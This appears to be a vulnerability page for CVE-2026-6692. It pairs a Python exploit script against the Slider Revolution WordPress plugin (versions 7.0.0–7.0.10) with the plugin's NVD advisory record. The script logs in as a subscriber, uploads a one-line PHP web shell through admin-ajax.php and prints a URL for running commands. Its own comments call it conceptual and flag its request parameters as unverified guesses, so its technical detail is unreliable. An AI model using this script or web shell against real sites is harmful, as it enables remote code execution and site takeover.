CVE-2026-6692

import requests # Exploit Title: WordPress Slider Revolution < 7.0.11 - Arbitrary File Upload (RCE) # Date: 2026-05-07 # Exploit Author: Analyst # Vendor Homepage: https://www.sliderrevolution.com/ # Software Link: https://wordpress.org/plugins/revslider/ # Version: 7.0.0 - 7.0.10 # Tested on: WordPress 6.x # Configuration target_url = 'http://target-site.com' username = 'subscriber' password = 'password' shell_filename = 'shell.php' # Login to get session session = requests.Session() login_data = {'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/'} session.post(target_url + '/wp-login.php', data=login_data) # Payload generation # The vulnerable endpoint is typically related to the media handling functions. # This is a conceptual PoC based on the vulnerability description. upload_url = target_url + '/wp-admin/admin-ajax.php' # Multipart data simulating the vulnerable request files = { 'file': (shell_filename, '<?php system($_GET["cmd"]); ?>', 'application/octet-stream') } data = { 'action': 'revslider_ajax_action', # Example action, needs verification 'client_action': 'update_plugin' # Example action, needs verification } response = session.post(upload_url, files=files, data=data) if response.status_code == 200 and 'success' in response.text: print(f"[+] Shell uploaded successfully!") print(f"[+] Access your shell at: {target_url}/wp-content/uploads/{shell_filename}?cmd=whoami") else: print("[-] Upload failed. Check permissions or endpoint.")

{"cve": {"id": "CVE-2026-6692", "sourceIdentifier": "[email protected]", "published": "2026-05-07T06:16:05.410", "lastModified": "2026-05-07T14:00:05.650", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Slider Revolution plugin for WordPress is vulnerable to Arbitrary File Upload in versions 7.0.0 to 7.0.10 via the '_get_media_url' and '_check_file_path' function. This is due to insufficient file type validation. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload files that may be executable, which makes remote code execution possible. The vulnerability was partially patched in version 7.0.10 and fully patched in version 7.0.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.sliderrevolution.com/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a2e802a6-d2f1-47cc-883a-89110e569168?source=cve", "source": "[email protected]"}]}}